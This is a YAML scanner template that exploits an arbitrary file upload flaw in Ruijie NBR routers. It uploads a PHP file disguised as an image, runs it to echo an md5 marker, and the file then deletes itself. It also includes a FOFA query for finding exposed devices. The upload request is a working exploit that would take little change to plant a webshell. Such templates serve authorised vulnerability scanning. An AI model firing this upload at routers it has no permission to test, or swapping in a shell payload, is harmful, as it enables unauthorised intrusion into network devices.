40 lines
1.4 KiB
YAML
40 lines
1.4 KiB
YAML
id: ruijie-nbr-fileupload
|
|
|
|
info:
|
|
name: Ruijie NBR fileupload.php - Arbitrary File Upload
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
Ruijie NBR router fileupload.php file has an arbitrary file upload vulnerability. An attacker can upload any file to the server through the vulnerability to obtain server permissions.
|
|
reference:
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: app="Ruijie-NBR路由器"
|
|
tags: ruijie,fileupload,intrusive,nbr
|
|
|
|
variables:
|
|
filename: "{{rand_base(6)}}"
|
|
string: "ruijie-nbr-fileupload"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /ddi/server/fileupload.php?uploadDir=upload&name={{filename}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/plain, */*; q=0.01
|
|
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
|
|
Content-Type: image/jpeg
|
|
|
|
<?php echo md5("{{string}}");unlink(__FILE__);?>
|
|
- |
|
|
GET /ddi/server/upload/{{filename}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- '{{md5(string)}}'
|
|
# digest: 490a0046304402207a4c82036fd5ca92c6688b2b58f7f9f91f9e9f17893be3f057547addc4bf5cfa0220426b2ecb4c3ae909e44e898c73c02180888b4ca103cceb5fcc0d5f0c28e2559f:922c64590222798bb761d5b6d8e72950 |